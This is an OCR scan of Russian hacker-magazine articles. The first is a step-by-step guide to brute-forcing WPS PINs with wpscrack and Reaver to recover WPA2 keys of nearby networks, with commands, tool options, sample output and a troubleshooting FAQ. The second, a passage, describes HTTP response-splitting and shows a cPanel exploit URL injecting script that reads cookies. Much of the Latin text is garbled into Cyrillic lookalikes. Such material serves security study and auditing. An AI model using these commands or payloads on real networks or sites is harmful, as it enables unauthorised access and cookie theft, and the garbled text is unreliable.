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НОМГГО: 

ВЗЛОМАТЬ 

ЗАЮЧАОЖ 



Еще не так давно казалось, что беспроводная сеть, защищенная с помощью технологии 
Ѵ\/РА2, вполне безопасна. Подобрать простой ключ для подключения действительно 
возможно. Но если установить по-настоящему длинный ключ, то сбрутить его 
не помогут ни радужные таблицы, ни даже ускорения за счет 6РІІ. Но, как 
оказалось, подключиться к беспроводной сети можно и без этого — 

воспользовавшись недавно найденной уязвимостью в протоколе ѴѴР5. 




База уязвимых 
моделей 
беспроводных 
точек доступа, 
оформленная в виде 
таблицы Соодіе 
Оосв: 

аоо.д1/32|Ф 



ШКМІЫ6 

Вся информация 
представлена 
исключительно 
в образовательных 
целях. 

Проникновение 
в чужую 
беспроводную 
сеть легко может 
быть расценено 
какуголовное 
преступление. 
Думай головой. 
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ОТ’СІ ОСИ 100003 

ИШІІПІЙШ1ВВКШІ 

С0С1СО500О55 

«йіНІвѵІНІІЙІШІІІІ 

((Г 04в4-ЬЭ54) 


Логотип ѴѴР5 РІМ-код ѴѴР5 



Рисунок 1. РІМ-код ѴѴР5, написанный на корпусе роутера 



ЦЕНА УПРОЩЕНИЙ 



Открытых точек доступа, к которым вообще 
не надо вводить ключ для подключения, 
становится все меньше и меньше. Кажется, что 
скоро их можно будет занести в Красную книгу. 
Если раньше человек мог даже и не знать, что 
беспроводную сеть можно закрыть ключом, 
обезопасив себя от посторонних подключе- 
ний, то теперь ему все чаще подсказывают 
о такой возможности. Взять хотя бы кастомные 
прошивки, которые выпускают ведущие про- 
вайдеры для популярных моделей роутеров, 
чтобы упростить настройку. Нужно указать две 
вещи — логин/пароль и... ключ для защиты 
беспроводной сети. Что еще более важно, 
сами производители оборудования стараются 
сделать процесс настройки незамысловатым. 
Большинство современных роутеров поддер- 
живают механизм ѴѴР5 (ѴѴі-Рі Ргоіесіесі Беіир). 

С его помощью пользователь за считанные 
секунды может настроить безопасную беспро- 
водную сеть, вообще не забивая себе голову 
тем, что «где-то еще нужно включить шифро- 
вание и прописать ѴѴРА-ключ». Ввел в системе 
восьмизначный символьный РІМ, который 
написан на роутере, - и готово! И вот здесь 
держись крепче. В декабре сразу два иссле- 
дователя рассказали о серьезных фундамен- 
тальных прорехах в протоколе ѴѴР5. Это как 
черный ход для любого роутера. Оказалось, 
что если в точке доступа активирован ѴѴР5 (ко- 
торый, на минуточку, включен в большинстве 
роутеров по умолчанию), то подобрать РІМ для 
подключения и извлечь ключ для подключе- 
ния можно за считанные часы! 



КАК РАБОТАЕТ ѴѴР5? 



Задумка создателей ѴѴР5 хороша. Механизм 
автоматически задает имя сети и шифрование. 
Таким образом, пользователю нет необходи- 
мости лезть в веб-интерфейс и разбираться 
со сложными настройками. А к уже настро- 
енной сети можно без проблем добавить 
любое устройство (например, ноутбук): если 
правильно ввести РІМ, то он получит все необ- 
ходимые настройки. Это очень удобно, поэтому 
все крупные игроки на рынке (СІзсо/Ыпквуз, 
Меідеаг, 0-Ыпк, Веікіп, Ви^^аіо, 2уХЕ1) сейчас 
предлагают беспроводные роутеры с поддерж- 
кой ѴѴР5. Разберемся чуть подробнее. 

Существуеттри варианта использования 
ѴѴР5: 

1 . РизЬ-Вииоп-СоппесІ (РВС). Пользователь 




нажимаетспециальную кнопку на роутере 
(хардварную) и на компьютере (софтверную), 
тем самым активируя процесс настройки. 
Нам это неинтересно. 

2 . Ввод РІМ-кода в веб-интерфейсе. Пользо- 
ватель заходит через браузер в админи- 
стративный интерфейс роутера и вводит 
там РІМ -код из восьми цифр, написанный 
на корпусеустройства (рисунок 1), после 
чего происходит процесс настройки. Этот 
способ подходит скорее для первоначаль- 
ной конфигурации роутера, поэтому мы его 
рассматриватьтоже не будем. 

3 . ВводРІМ-кода на компьютере пользовате- 
ля (рисунок 2). При соединении с роутером 
можно открыть специальную сессию ѴѴР5, 
в рамках которой настроить роутер или 
получить уже имеющиеся настройки, если 
правильно ввести РІМ-код. Вотэтоуже при- 
влекательно. 

Для открытия подобной сессии не нуж- 
на никакая аутентификация. Это может 
сделать любой желающий! Получается, что 



РІМ-код уже потенциально подвержен ата- 
ке типа Ьгиіеі'огсе. Но это лишь цветочки. 



УЯЗВИМОСТЬ 



Как я уже заметил ранее, РІМ-код состоит 
из восьми цифр — следовательно, существует 
(100 000 000) вариантов для подбора. Од- 
нако количество вариантов можно существен- 
но сократить. Дело в том, что последняя цифра 
РІМ-кода представляет собой некую контроль- 
ную сумму, которая высчитывается на осно- 
вании семи первых цифр. В итоге получаем 
уже (10 000 000) вариантов. Но и это еще 
не все! Далее внимательно смотрим на устрой- 
ство протокола аутентификации ѴѴР5 (рисунок 
3). Такое ощущение, что его специально про- 
ектировали, чтобы оставить возможность для 
брутфорса. Оказывается, проверка РІМ-кода 
осуществляется в два этапа. Он делится на две 
равные части, и каждая часть проверяется от- 
дельно! Посмотрим на схему: 

1 . Если послеотсылки сообщения М4атакую- 
щий получил в ответЕАР-МАСК,то он может 
быть уверен, что первая часть РІМ-кода 
неправильная. 

2 . Еслижеон получил ЕАР-МАСКпослеот- 
сылки Мб, то, соответственно, вторая часть 
РІМ-кода неверна. Получаем 10'^4 (10 000) 
вариантов для первой половины и (1 
000) для второй. В итоге имеем всего лишь 
11 000 вариантов для полного перебора. 
Чтобы лучше понять, как это будет работать, 
посмотри на схему. 

3 . Важный момент — возможная скорость 
перебора. Она ограничена скоростью обра- 
ботки роутером ѴѴР5-запросов: одниточки 
доступа будут выдавать результат каждую 
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Рисунок 3. Протокол аутентификации ѴѴР5 
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секунду, другие — каждые десять секунд. 
Основное время при этом затрачивается 
на расчет открытого ключа поалгоритму 
Диффи-Хеллмана, он должен бытьсгенери- 
рован перед шагом М3. Затраченное на это 
время можноуменьшить, выбрав на стороне 
клиента простой секретный ключ, который 
в дал ьнейшем у простит расчеты других 
ключей. Практика показывает, что для 
успешного результата обычно достаточно 
перебратьлишь пол овину всех вариантов, 
и в среднем брутфорс занимает всего отче- 
тырехдодесяти часов. 



ПЕРВАЯ РЕАЛИЗАЦИЯ 



Первой появившейся реализацией брутфорса 
стала утилита ѵѵрзсгаск ( аоо.аІ/9ѵѵАВ] ). на- 
писанная исследователем Стефаном Фибё- 
ком на языке РуіЬоп. Утилита использовала 
библиотеку Зсару, позволяющую конструиро- 
вать произвольные сетевые пакеты. Сценарий 
можно запустить только под Ыпих-системой, 
предварительно переведя беспроводной 
интерфейс в режим мониторинга. В качестве 
параметров необходимо указать имя сетевого 
интерфейса в системе, МАС-адрес беспро- 
водного адаптера, а также МАС-адрес точки 
доступа и ее название (55Ю). 

$ . /ырзсгаск. рѵ --і-Расе топѲ \ 

--сИеШ: 94:Ѳс:6сІ:88:ѲѲ:ѲѲ \ 

--Ьббісі -Р4:ес:38:с-Р:00:00 --ббісі 1;е5- 
1;ар -V 

Бпі-р-Рег 5І:аг1;есІ 

1;гуіп§ 00000000 

а1;1;етр1; 1;оок 0.95 зесопсІБ 

Іігуіп^ 00010009 

< . . . > 

1:гуіп§ 18660005 

а1:1:етр1: 1:оок 1.08 бѳсопсіб 

1;гуіп§ 18670004 # -РоипсІ І5І: Ііаі-Р о-Р 

РІМ 

а1:1:етр1: 1:оок 1.09 зесопсІБ 

Іігѵіп^ 18670011 

а1;1;етр1; 1;оок 1.08 бѳсопсіб 



< . . . > 

1;гуіп§ 18674095 # -РоипсІ 25І: ІіаІ-р о-р 

РІМ 

< . . . > 

Меііыогк Кеу: 

геа11у_геа11у_1оп§_ыра_ра55рІіга5е_§оосІ_ 

1иск_сгаскіп§_1;ІіІ5_опе 

< . . . > 

Как видишь, сначала была подобрана 
первая половина РІМ-кода, затем — вторая, 
и в конце концов программа выдала готовый 
к использованию ключ для подключения 
к беспроводной сети. Сложно представить, 
сколько времени потребовалось бы, чтобы 
подобрать ключ такой длины (61 символ) 
ранее существовавшими инструментами. 
Впрочем, ѵѵрзсгаск не единственная утилита 
для эксплуатации уязвимости, и это довольно 
забавный момент: в то же самое время над 
той же самой проблемой работал и другой 
исследователь — Крейг Хеффнер из компании 
Тасіісаі Меіѵѵогк Зоіиііопз. Увидев, что в Сети 
появился работающий РоС для реализа- 
ции атаки, он опубликовал свою утилиту 
Реаѵег І сосіе.аооаіе.сопп/р/геаѵег-ѵѵрз ]. Она 
не только автоматизирует процесс подбора 
ѴѴР5-РІМ и извлекает Р5К-ключ, но и пред- 
лагает большее количество настроек, чтобы 
атаку можно было осуществить против самых 
разных роутеров. К тому же она поддерживает 
намного большее количество беспроводных 
адаптеров. Мы решили взять ее за основу 
и подробно описать, как злоумышленник 
может использовать уязвимость в протоколе 
ѴѴРЗдля подключения к защищенной бес- 
проводной сети. 



ноѵѵ-то 



Как и для любой другой атаки на беспровод- 
ную сеть, нам понадобится Ыпих. Тут надо 
сказать, что Реаѵег присутствует в репозито- 
рии всеми известного дистрибутива ВаскТгаск 
( Ьаскігаск-Ііпих.огд ). в котором к тому же уже 
включены необходимые драйвера для беспро- 



ЭКСПРЕСС-КУРС ПО ВЗЛОМУ ѴѴІ-РІ 



1. ѴѴЕР (ѴѴІгесІ Еяиіѵаіепі Ргіѵасу) 

Самая первая технология для защиты бес- 
проводной сети оказалась крайне слабой. 
Взломать ее можно буквально за несколько 
минут, используя слабости применяемого в ней 
шифра РС4. Основными инструментами здесь 
служат снифер аігосіитр-пд для сбора пакетов 
и утилита аігсгаск-пд, используемая непосред- 
ственно для взлома ключа. Также существует 
специальная тулза ѵѵеззісіе-пд, которая вообще 
взламывает все близлежащие точки с ѴѴЕР 
в автоматическом режиме. 

2. ѴѴРА/ѴѴРА2 (ѴѴігеІезз Ргоіесіесі Ассезз) 
Перебор — это единственный способ подо- 



брать ключ для закрытой ѴѴРА/ѴѴРА2 сети (да 
и то исключительно при наличии дампа так 
называемого ѴѴРА НапсІзЬаке, который переда- 
ется в эфир при подключении клиента кточке 
доступа). Брутфорс может затянуться на дни, 
месяцы и годы. Для увеличения эффективно- 
сти перебора сначала использовались специа- 
лизированные словари, потом были сгенери- 
рованы радужные таблицы, позже появились 
утилиты, задействовавшие технологии МѴЮІА 
СиОА и АТІ Бігеат для аппаратного ускорения 
процесса за счет ЗРІІ. Используемые инстру- 
менты — аігсгаск-пд (брутфорс по словарю), 
соѵѵраііу (с помощью радужных таблиц), ругіі 
(с использованием видеокарты). 




Рисунок 4. Блок-схема брутфорса РІМ-кода ѴѴР5 



ВОДНЫХ устройств. Поэтому использовать мы 
будем именно его. 

Шаг 0. Готовим систему 

На официальном сайте ВаскТгаск 5 Р1 до- 
ступен для загрузки в виде виртуальной 
машины под ѴМѵѵаге и загрузочного образа 
150. Рекомендую последний вариант. Можно 
просто записать образ на болванку, а можно 
с помощью программы ОМеШооІіп ( ипеШооІіп. 
зоигсеІ'огде.пеП сделать загрузочную флешку: 
так или иначе, загрузившись с такого носи- 
теля, мы без лишних заморочек сразу будем 
иметь систему, готовую к работе. 

Шаг 1. Вход в систему 

Логин и парольдля входа поумолчанию- 
гооЛІоог. Оказавшись в консоли, можно смело 
стартовать иксы (есть отдельные сборки 
ВаскТгаск — как с ОМОНЕ, так и с КОЕ): 

# 5І:аг1:х 



Шаг 2. Установка Кеаѵег 

Чтобы загрузить Реаѵег, нам понадобится 
интернет. Поэтому подключаем патчкорд 
или настраиваем беспроводной адаптер 
(АррІісаЛопз -> Іпіегпеі -> ѴѴіссІ Меіѵѵогк 
Нападет). Далее запускаем эмулятор тер- 
минала, где загружаем последнюю версию 
утилиты через репозиторий: 

# ар1;-§е1; ирсіаііе 

# ар1;-§е1; іп5І;а11 геаѵег 

Тут надо сказать, что в репозитории на- 
ходится версия 1.3, которая лично у меня 
заработала неправильно. Поискав информа- 
цию о проблеме, я нашел пост автора, который 
рекомендует обновиться до максимально 
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ВОЗМОЖНОЙ версии, скомпилировав исход- 
ники, взятые из 5ѴМ. Это, в общем, самый 
универсальный способ установки (для любого 
дистрибутива). 

$ 5ѴП сбескоиі; Іі1:1;р://геаѵег-ыр5. 
§оо§1есос1е. сот/5ѵп/1;гипк/ геаѵег-ырз 
$ ссі ./геаѵег-ыр5/5гс/ 

$ ./сопб^иге 

$ таке 

# таке іп5І:а11 



Никаких проблем со сборкой под ВаскТгаск 
не будет — проверено лично. В дистрибутиве 
АгсЬ Ыпих, которым пользуюсь я, установка 
производится и того проще, благодаря нали- 
чию соответствующего РКбВШЮ'а: 

$ уаоигі: -5 геаѵег-ыр5-5ѵп 

Шаг 3. Подготовка к брутфорсу 

Для использования Реаѵег необходимо про- 
делать следующие вещи: 

• перевести беспроводной адаптер в режим 
мониторинга; 

• узнать имя беспроводного интерфейса; 

• узнать МАС-адрес точки доступа (В55Ю); 

• убедиться, что на точке активирован ѴѴР5. 

Для начала проверим, что беспроводной 
интерфейс вообще присутствует в системе: 

• іысопб§ 

Если в выводе этой команды есть интер- 
фейс с описанием (обычно это ѵѵІапО) - значит, 
система распознала адаптер (если он подклю- 
чался к беспроводной сети, чтобы загрузить 
Реаѵег, то лучше оборвать подключение). 
Переведем адаптер в режим мониторинга: 

• аігтоп-п§ 5І;аг1; ы1ап0 



Эта команда создает виртуальный интер- 
фейс в режиме мониторинга, его название 
будет указано в выводе команды (обычно это 
топО). Теперь нам надо найти точку доступа 
для атаки и узнать её В55Ю. Воспользуемся 
утилитой для прослушки беспроводного эфира 
аігосіиппр-пд: 

# аігосіитр-п^ топѲ 

На экране появится списокточек доступа 
в радиусе досягаемости. Нас интересуют точки 
с шифрованием ѴѴРА/ѴѴРА2 и аутентификацией 
по ключу Р5К. Лучше выбирать одну из пер- 
вых в списке, так как для проведения атаки 
желательна хорошая связь с точкой. Если точек 
много и список не умещается на экране, то мож- 
но воспользоваться другой известной утилитой 
— кІБітіеІ, там интерфейс более приспособлен 
в этом плане. Опционально можно на месте про- 
верить, включен ли на нашей точке механизм 
ѴѴР5. Для этого в комплекте с Реаѵег (но только 
если брать его из 5ѴМ) идет утилита ѵѵазЬ: 

# ./ыазіі -і топѲ 

В качестве параметра задается имя 
интерфейса, переведенного в режим мони- 
торинга. Также можно использовать опцию 
'-Г и скормить утилите сар-файл, созданный, 
например, тем же аігосІиппр-пд. По непонятной 
причине в пакет Реаѵег в ВаскТгаск не включи- 
ли утилиту ѵѵазЬ. Будем надеяться, к моменту 
публикации статьи эту ошибку исправят. 

Шаг 4. Запускаем брутфорс 

Теперь можно приступать непосредственно 
к перебору РІМ'а. Для старта Реаѵег в самом 
простом случае нужно немного. Необходимо 
лишь указать имя интерфейса (переведенного 
нами ранее в режим мониторинга) и В55Ю 
точки доступа: 




Рисунок 6. Реаѵег Рго — железка от создателей Реаѵег 

# геаѵег -і топ0 -Ь 00:21:29:74:67:50 
-ѵѵ 

Ключ "-ѵѵ" включает расширенный вывод 
программы, чтобы мы могли убедиться, что все 
работает как надо. 

Реаѵег ѵ1.4 ІлІіРі Рго1:ес1;ес1 5е1;ир А1;1;аск 
Тооі 

Соругі§Іі1; (с) 2011^ ТасСісаІ Меііыогк 
5о1и1;іоп5^ Сгаі§ НеТ-Рпег <сІіе-р-Рпег@ 

1іаспе1:50І. сот> 

[+] Іліаііііп^ -Рог Ьеасоп Тгот 

00:21:29:74:67:50 

[+] А550сіа1;есІ ыі1;Іі 00:21:29:74:67:50 
(Е55ІО: ИпкзуБ) 

[+] Тгуіп§ ріп 63979978 

Если программа последовательно отправ- 
ляет РІМ'ы точке доступа, значит, все завелось 
хорошо, и остается тупо ждать. Процесс может 
затянуться. Самое короткое время, за которое 
мне удалось сбрутфорсить РІМ, составило 
примерно пять часов. Как только он будет по- 
добран, программа радостно об этом сообщит: 

[+] Тгуіп§ ріп 64637129 

[+] Кеу сгаскесі іп 13654 зесопсІБ 

[ + ] ІЛІР5 РIN: '64637129' 

[+] ІЛІРА Р5К: 'МуН0ГБеТІііпк$Уои51;о13НІ5Са 

ГГОІ: ! ' 

[ + ] АР 55ІР: 'ИпкБѴБ' 

Самое ценное здесь — это, конечно же, 
ключ ѴѴРА-Р5К, который сразу же можно ис- 
пользовать для подключения. Все так просто, 
что даже не укладывается в голове. 



можно ли ЗАЩИТИТЬСЯ? 



Защититься от атаки можно пока одним 
способом — отключить нафиг ѴѴР5 в настрой- 
ках роутера. Правда, как оказалось, сделать 
это возможно далеко не всегда. Поскольку 
уязвимость существует не на уровне реализа- 
ции, а на уровне протокола, ждать от произ- 
водителей скорого патча, который решил бы 
все проблемы, не стоит. Самое большее, что 
они могут сейчас сделать, - это максимально 
противодействовать брутфорсу. Например, 
если блокировать ѴѴР5 на один час после пяти 
неудачных попыток ввода РІМ-кода, то перебор 
займетуже около 90 дней. Но другой вопрос, 
насколько быстро можно накатить такой патч 
на миллионы устройств, которые работают 
по всему миру? ^ 



= і г(■й’и^^г -1 попа й ію: ?і і7Ч;Т4-!б7 ; Ы) -с Б -е мгняуя п іь -ѵѵ 

Н.мѵщг ѵі.г ЧіРі Ргоіѵсіі'із АІІвск Тооі 

[С? 2 Ѳ 11 , тлспсаі. н&ггпёг 

Е4] к/пітіпді Гпг Ьеспсоп Ггм 9й::21 7-1 : Б7:БЕ1 

[*] $ѵіикіпд РопЗ ^0- скаппсЯ € 

Е+] ТгуІГкІІ ріп 
ІЧ тгуііі® ріп 

ЕЧ Ресбіѵл ІітвриІ ассигшіі 

С 

і геаѵег -1 попЭ -Ь вві21і?9:7л .67 ^ 5Й -с 6 -е --ріп &4617129 -ѵ- 

Рй^ѵС-Г ѴІ.2 РгеіФСІЁУ 5й1ир АіІдСК ТР4І 

'■□р^ѴГІдЪі Ссі 2011^ ТиЕІІсаІ НеЬѵегк бсіиііспъ, Сг-аід НеС Гпег -ч:ІіеТ Гпвг^^аспеіьеі . сінр 

Е^І Іо г Ьеасоп ^гст 08:21:2^:74:67:50 

Вч-І БѵіІсЬіпд вапв Іо сііаппві б 

Е#] ТгуИіу рігі Б4617174 
ЕЧ сгвсксгі ш г 5^^сбпП5 

ЕЧ РІН: 6ІІЙ37129' 

Е4] Р5Кг ‘НуНагБе-ТЪіпкІіаиЕІоІЭНІБІІаггЕіІ:!" 

ЕЧ ЛР 6610; ЧіпѴ^уй' 

* I 



Рисунок 5. Пример работы брутфорса Реаѵег 
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НОѴѴТО: Взломать ѴѴі-Рі за 10 часов 



РАО 



□ Какой беспроводной адаптер нужен 
для взлома? 

□ Перед тем как экспериментировать, 
нужно убедиться, что беспроводной 
адаптер может работать в режиме монито- 
ринга. Лучший способ — свериться со спи- 
ском поддерживаемого оборудования 
на сайте проекта Аігсгаск-пд ( ЬіЦу/ѵѵіП 
асіаріег ІізП . Если же встанет вопрос о том, 
какой беспроводной модуль купить, то 
начать можно с любого адаптера на чипсете 
РТ181871. иЗВ'шные донглы легко найти 
в интернете за $20. 

□ Почему у меня возникают ошибки 
"Іітеоиі" и "оиі о! огсіег"? 

□ Обычно это происходит из-за низкого 
уровня сигнала и плохой связи сточкой 
доступа. Кроме того, точка доступа может 
на время заблокировать использование ѴѴР5. 



□ Почему при плохом сигнале Пеаѵег 

работает плохо, хотя тот же взлом ѴѴЕР 
проходит нормально? 

□ Обычно взлом ѴѴЕР происходит путем 
повторной пересылки перехваченных 
пакетов, чтобы получить больше векторов 
инициализации (IV), необходимых для 
успешного взлома. В этом случае неважно, 
потерялся какой-либо пакет, либо как-то 



был поврежден по пути. А вот для атаки 
на ѴѴР5 необходимо строгое следование 
протоколу передачи пакетов между точкой 
доступа и Реаѵегдля проверки каждого 
РІМ-кода. Если при этом какой-то пакет 
потеряется, либо придет в непотребном 
виде, то придется заново устанавливать 
ѴѴР5-сессию. Это делает атаки на ѴѴР5 
гораздо более зависимы ми от уровня 
сигнала. Важно помнить, что если твой 
беспроводной адаптер видит точку доступа, 
то это ещё не значит, что и точка доступа 
видит тебя. Так что если ты являешься 
счастливым обладателем высокомощного 
адаптера от АІРА Меіѵѵогк и антенны 
на пару десятков сІВі, то не надейся, что 
получится поломать все пойманные точки 
доступа. 

Почему у меня не работает спуфинг 
МАС-адреса? 

Возможно, ты спуфишь МАС виртуально- 
го интерфейса топО, а это работать 
не будет. Надо указывать имя реального 
интерфейса, например, ѵѵІапО. 

Реаѵег все время посылает точке доступа 
один и тот же РІЫ, в чем дело? 

Проверь, активирован ли на роутере 
ѴѴР5. Это можно сделать при помощи ути- 





литы ѵѵазЬ: запусти её и проверь, что твоя цель 
находится в списке. 

□ Почему я не могу ассоциироваться 
сточкой доступа? 

□ Это может быть из-за плохого уровня 
сигнала или потому, что твой адаптер 
непригоден для подобных изысканий. 



□ Почему я постоянно получаю ошибки 
"га(е Іітіііпд с1е(ес(ес1"? 

□ Это происходит потому, что точка 

доступа заблокировала ѴѴР5. Обычно 
это временная блокировка (около пяти 
минут), но в некоторых случаях могут 
влепить и перманентный бан (разблокировка 
только через административную панель). 
Есть один неприятный баг в Реаѵег версии 
1.3, из-за которого не определяются снятия 
подобных блокировок. В качестве воркэра- 
унда предлагают использовать опцию 
'--ідпоге-Іоскз' или скачать последнюю 
версию из 5ѴМ. 



□ г 



I Можно ли одновременно запустить два 
и более экземпляров Реаѵег для ускорения 
атаки? 

□ Теоретически можно, но если они будут 
долбить одну и ту же точку доступа, то 
скорость перебора едва ли увеличится, так как 
в данном случае она ограничивается слабым 



ПРОКАЧИВАЕМ РЕАѴЕР 



В НОѴѴТО мы показали самый простой и наиболее универсальный 
способ использования утилиты Реаѵег. Однако реализация ѴѴР5 у разных 
производителей отличается, поэтому в некоторых случаях необходима 
дополнительная настройка. Ниже я приведу дополнительные опции, 
которые могут повысить скорость и эффективность перебора ключа. 

1. Можно задать номер канала и 55Ю точки доступа: 

# геаѵег -і топ0 -Ь 00:01:02:03:04:05 -с 11 -е Ііпкзуз 

2. Благотворно сказывается на скорости брутфорса опция '--сІИ-зтаІГ, 
которая задает небольшое значение секретного ключа, тем самым облегчая 
расчеты на стороне точки доступа: 

# геаѵег -і топ0 -Ь 00:01:02:03:04:05 -ѵѵ --сііі-зтаіі 

3. Таймаут ожидания ответа по умолчанию равен пяти секундам. При 
необходимости его можно изменить: 

# геаѵег -і топ0 -Ь 00:01:02:03:04:05 -1: 2 

4. Задержка между попытками по умолчанию равна одной секунде. Она 
также может быть настроена: 

# геаѵег -і топ0 -Ь 00:01:02:03:04:05 -сі 0 



5. Некоторые точки доступа могут блокировать ѴѴР5 на определенное 
время, заподозрив, что их пытаются поиметь. Реаѵег эту ситуацию замечает 
и делает паузу в переборе на 315 секунд по умолчанию, длительность этой 
паузы можно менять: 

# геаѵег -і топ0 -Ь 00:01:02:03:04:05 - -1оск-сІе1ау=250 

6. Некоторые реализации протокола ѴѴР5 разрывают соединение при 
неправильном РІМ-коде, хотя по спецификации должны возвращать особое 
сообщение. Реаѵег автоматически распознаеттакую ситуацию, для этого 
существует опция '--паск': 

# геаѵег -і топ0 -Ь 00:01:02:03:04:05 --паск 

7. Опция '--еар-іегтіпаіе' предназначена для работы с теми АР, которые 
требуют завершения ѴѴР5-сессии с помощью сообщения ЕАР РАН: 

# геаѵег -і топ0 -Ь 00:01:02:03:04:05 - -еар-1:егтіпа1:е 

8. Возникновение ошибок в ѴѴР5-сессии может означать, что АР 
ограничивает число попыток ввода РІМ-кода, либо просто перегружена 
запросами. В этом случае Реаѵег приостанавливает свою деятельность, 
причем время паузы может быть задано с помощью опции '--^аіі-ѵѵаіі': 

# геаѵег -і топ0 -Ь 00:01:02:03:04:05 - --Раі1-ѵ\/аі1;=360 
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На нашем диске 
ты сможешь 
найти подробное 
обучающее видео 
ко всем описанным 
в статье примерам. 



УЯЗВИМОСТИ 
РАСЩЕПЛЕНИЯ ЗАПРОСА 
И ВНЕДРЕНИЯ ЗАГОЛОВКОВ 
В СОВРЕМЕННОМ ВЕБЕ 



С того момента, как в 2002 году были 
впервые обнаружены уязвимости 
расщепления НТТР-ответа сервера, 
интерпретаторы, приложения и сами 
браузеры успели обзавестись 
встроенными механизмами защиты. 
Однако большинство из этих 
механизмов при должном старании 
достаточно легко обмануть, что я 
и продемонстрирую на примере всем 
известного РНР. 



ѴІУ/ѴІ 

ЬіЩАСШЗІ— еоосі- 
Ьуе НТТР Кевропзе 
Зрііиіпд, апсИЬапкз 
{огаШИеПзИ (ЗІеТап 
Еззег). 

ЬИ.1у/ууВ 9062 — 
классическая атака 
типа «расщепление 
запроса»#!. 
ЬШу/АВОууЬг — 
классическая атака 
типа «расщепление 
запроса» #2. 
ЬИ.Іу/аѴУОбдх — 
классическая атака 
типа «расщепление 
запроса» #3. 




Обход фильтрации СРІР в РНР для Іпіегпеі Ехріогег 7/8/9. 
%0(1%0с1%20 (%09) 




Проводим атаку на ІЕ с обходом фильтра РНР и фильтра Х55 
(Х-Х55-РгоІесІіоп) 
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ИВЛДСП9ІЙ 




ІМТРО 

Существует два глобальных метода для поиска уязвимостей: вос- 
ходящий и нисходящий анализ. Первый подход подразумевает 
движение от конечного вызова к точке входа, второй — в об- 
ратном направлении. Например, при анализе исходного кода 
веб-приложения на РНР можно выписать все пользовательские 
переменные, используемые в коде, и проследить, на что они влия- 
ют и куда попадают. А можно наоборот — выписать все интересные 
функции (например, еѵаі) и идти вверх в надежде обнаружить, 
где в аргумент этой самой интересной функции попадает какой- 
нибудь $_СЕТ[ ]. Эти два подхода не замещают друг друга, но я 
не люблю сильно углубляться в теорию и не буду продолжать рас- 
суждения на этот счет. Просто замечу, что в этой статье я рассмо- 
трю не только сами уязвимости, но и те практические предпосылки 
и логические рассуждения, которые позволили их обнаружить. 
Зачем? Исключительно для того, чтобы изменить общепринятое 
суждение о веб-хакерах как о людях, «круто расставляющих ка- 
вычки», в положительную сторону. 

РАСЩЕПЛЕНИЕ, КОТОРОЕ БОЛЬШЕ НЕ РАБОТАЕТ 

Перед тем как начать наши изыскания, напомню тебе о том, что 
такое НТТР Резропзе Зрііиіпд. Во время проведения такой атаки 
злоумышленник посылает уязвимому серверу всего один ядови- 
тый НТТР-запрос. Веб-сервер формирует такой выходной поток, 
который жертва принимает за целых два НТТР-ответа (хотя должна 
принимать за один). Нападающий может и не контролировать 
первый ответ, зато полностью составляет второй, от НТТР-статуса 
до самого последнего байта. Таким образом, злоумышленник 



может сконструировать произвольный НТТР-ответ и реализовать 
множество разнообразных атак, включая СасЬе Роізопіпд, Сгозз- 
зііе Всгірііпд (Х55) или, к примеру. Раде Ндаскіпд. 

В качестве наглядного примера давай возьмем соответствую- 
щую уязвимость в сРапеІ 2010 года. Как и в большинстве других 
приложений, баг содержится в функции ІіеасІеп( 
.контролируемая_юзером_переменная). Вот пример эксплуатации 
такого бага: 

Ітіііір: //зегѵег .сот:2Ѳ82/1о^іп/?и5ег=-Роо&ра55=Ьаг&-Раі1иг1= 
%0Р%0АСоп1:еп1:-Тѵре:%2Ѳ1:ех1:/ІтІ:пі1%ѲР%ѲА%0Р%ѲА%ЗС5сгір1:%ЗЕа1е 

г1:%28%22 

Кесо^пІ2е-5есигі1:ѵ%20-%20%22%2ВсІоситеп1:.соокіе%29;%ЗС/ 

зсгір1:%ЗЕ%ЗС!-- 

А вот ответ сервера с внедренной нами Х55: 

НТТР/1Л 307 МоѵесІ 

Зегѵег: срзгѵсІ/11 . 25 

Соппесіііоп: сіозе 

Соп1:еп1:-1еп^1:Іі : 206 

Іосаіііоп: 

Соп1:еп1:-Тѵре: 1:ех1:/ІгІ:т1 

<5сгір1:>а1ег1:( "Кесо^пІ2е-$есигі1іѵ - "+сІоситеп1: . соокіе) ; 

</зсгір1:>< ! -- 

Соп1іеп1:-1:ѵре: 1іех1:/ІгІ:т1 

<Іі1:т1><ІіеасІ><МЕТА НТТР-Е0иіѴ="ге-РгезІі" СОМТЕМТ="0:ЦКІ= 
Соп1іеп1:-Туре: 1:ех1:/ІгІ:пі1 
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&11;; 5сгір1;&§1;; а1ег1;(&рио1;; Кесо§пІ2е-5есигі1;у - 

&ди о1::+сІосипі еп1:. .с.о^_і е )_; 

&11;;/5сгір1;&§1;;&11;; ! - - "></ІіеасІ><ЬосІу></ЬосІу></ІтІ:т1> 

Вообще, в процессе аудита исходного кода веб-приложений 
на РНР часто попадаются конструкции вида ІіеасІеп("Іоса'1;іоп: " 
.$_СЕТ['Ьаск-1;о_ип1']) или даже ІіеасІеп("Іоса'1;іоп: /іпсіех. 
рІір?1ап§=".$_СЕТ['1ап§']). Если первую еще можно классифициро- 
вать хотя бы как уязвимость класса Ореп Ресіігесі, то вторая вроде 
бы вообще не является уязвимостью. Опытный читатель заметит, 
что здесь в явном виде как раз таки и присутствует багтипа НТТР 
Резропзе Зрііиіпд, но всё дело в том, что современные версии 
интерпретатора РНР (начиная с 2006-го года) фильтруют раздели- 
тели %0с1%0а и препятствуют проведению атаки. Вот это и есть та 
самая практическая предпосылка, которая заставила меня начать 
углубленное изучение данной темы. Поэтому предлагаю не верить 
первому впечатлению о фильтрации в функции ЬеасІегО и разо- 
браться с проблемой глубже, ведь, быть может, такую фильтрацию 
можно обойти. 



ПРОТОКОЛ НТТР 



Обратимся к первоисточнику (спецификации протокола НТТР), что- 
бы понять, какие символы могут служить разделителями заголов- 
ков НТТР-ответа. Полный текст спецификации доступен по адресу 
Ыиу/г9р11. нас же интересует раздел 6 — Резропзе ( ЬіЕІу/ВЕАд4 ). 
Общая структура НТТР-ответа имеет следующий вид: 

Документация КРС-2616 

Кезропзе = 51;а1:и5-ііпе; 5ес1;іоп 6.1 

*(( ^епегаі-ііеасіег ; 5ес1:іоп 4.5 

I гезропзе-ііеасіег ; Бесіііоп 6.2 

I еп1;і1;у-ііеасіег ) СКІР); 5ес1;іоп 7.1 
СКІР 

[ те55а§е-ЬосІу ]; ЗесЫоп 7.2 

Из приведенной выше информации ясно, что разделителем 
заголовков является последовательность СРЕР, которая также ис- 
пользуется для отделения тела ответа от блока заголовков. В ОРЕ- 
